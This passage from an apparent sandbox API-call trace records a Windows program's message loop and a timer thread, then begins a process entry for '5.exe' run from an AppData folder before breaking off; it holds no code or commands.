lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.286] TranslateAcceleratorW (hWnd=0x2026e, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.286] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.286] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.287] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.986] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.986] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.986] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.986] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.032] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.032] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.033] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.033] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.033] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.033] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.033] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.034] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.079] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.079] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.079] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.079] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.079] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.079] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.079] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.080] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.126] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.126] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.126] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.126] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.126] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.127] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.127] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.128] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.234] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.234] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.234] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.234] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.234] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.234] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.234] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.235] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.272] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.272] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.272] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.272] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.273] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.273] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.273] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.274] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.314] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.314] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.314] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.315] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.315] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.315] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.315] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.316] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.360] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.360] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.360] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.361] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.361] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.361] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.361] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.362] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.407] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.407] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.407] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.407] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.407] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.407] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.407] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.408] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.469] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.469] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.469] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.469] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.469] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.469] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.469] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.470] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.516] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.516] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.516] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.517] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.517] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.517] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.517] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.518] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.563] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.563] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.563] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.563] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.563] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.563] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.563] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.564] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.604] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.604] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.605] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.605] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.605] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.605] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.605] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.606] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0092.766] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0092.766] TranslateMessage (lpMsg=0x18e548) returned 0 [0092.766] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0092.766] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.618] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0093.618] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.618] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.619] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.671] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0093.671] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.671] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.672] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.672] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0093.672] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.672] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.674] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.717] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0093.717] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.717] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.717] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0093.717] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0093.717] TranslateMessage (lpMsg=0x18e548) returned 0 [0093.717] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0093.718] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.379] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.704] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.704] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.704] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.704] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.705] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.715] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.716] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.716] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.716] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.716] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.716] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.716] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.717] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.946] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.946] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.946] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.946] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.946] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.946] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.946] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.948] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.981] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.981] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.981] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.981] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0094.981] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0094.981] TranslateMessage (lpMsg=0x18e548) returned 0 [0094.981] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0094.983] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.028] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.028] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.028] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.028] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.028] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.028] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.028] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.029] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.074] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.074] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.074] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.074] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.075] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.075] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.075] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.076] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.121] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.121] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.121] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.121] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.121] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.122] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.122] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.123] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.214] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.214] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.214] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.214] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.215] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.215] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.215] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.216] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.249] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.249] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.249] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.249] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.249] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.249] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.249] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.251] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.295] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.295] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.295] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.295] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.295] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.295] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.295] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.297] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0095.340] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0095.340] TranslateMessage (lpMsg=0x18e548) returned 0 [0095.340] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0095.340] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0097.467] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0097.467] TranslateMessage (lpMsg=0x18e548) returned 0 [0097.467] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0097.468] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0097.538] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0097.538] TranslateMessage (lpMsg=0x18e548) returned 0 [0097.538] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0097.539] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0097.539] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0097.539] TranslateMessage (lpMsg=0x18e548) returned 0 [0097.539] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0097.540] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.044] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.044] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.044] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.044] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.044] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.044] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.044] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.046] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.080] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.080] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.080] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.080] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.080] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.080] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.080] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.082] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.127] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.127] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.127] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.127] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.127] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.127] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.127] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.129] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.246] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.246] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.246] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.246] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.246] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.246] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.246] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.247] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.283] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.283] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.283] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.283] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.283] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.283] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.283] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.284] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.330] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.330] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.330] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.330] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0101.330] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0101.330] TranslateMessage (lpMsg=0x18e548) returned 0 [0101.330] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0101.331] GetMessageW (lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 55 os_tid = 0x898 [0083.547] timeGetTime () returned 0x115aa92 [0083.547] timeGetTime () returned 0x115aa92 [0083.547] Sleep (dwMilliseconds=0x3e8) [0084.763] timeGetTime () returned 0x115ae88 [0084.763] timeGetTime () returned 0x115ae88 [0084.763] Sleep (dwMilliseconds=0x3e8) [0085.842] timeGetTime () returned 0x115b27e [0085.842] timeGetTime () returned 0x115b27e [0085.842] Sleep (dwMilliseconds=0x3e8) [0086.853] timeGetTime () returned 0x115b674 [0086.853] timeGetTime () returned 0x115b674 [0086.853] Sleep (dwMilliseconds=0x3e8) [0091.845] timeGetTime () returned 0x115ba6a [0091.845] timeGetTime () returned 0x115ba6a [0091.845] Sleep (dwMilliseconds=0x3e8) [0092.866] timeGetTime () returned 0x115be60 [0092.866] timeGetTime () returned 0x115be60 [0092.866] Sleep (dwMilliseconds=0x3e8) [0094.379] timeGetTime () returned 0x115c439 [0094.379] timeGetTime () returned 0x115c439 [0094.379] Sleep (dwMilliseconds=0x3e8) [0097.464] timeGetTime () returned 0x115ce67 [0097.464] timeGetTime () returned 0x115ce67 [0097.464] Sleep (dwMilliseconds=0x3e8) [0101.042] timeGetTime () returned 0x115dc4b [0101.042] timeGetTime () returned 0x115dc4b [0101.042] Sleep (dwMilliseconds=0x3e8) Process: id = "9" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe" page_root = "0x31f5a000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 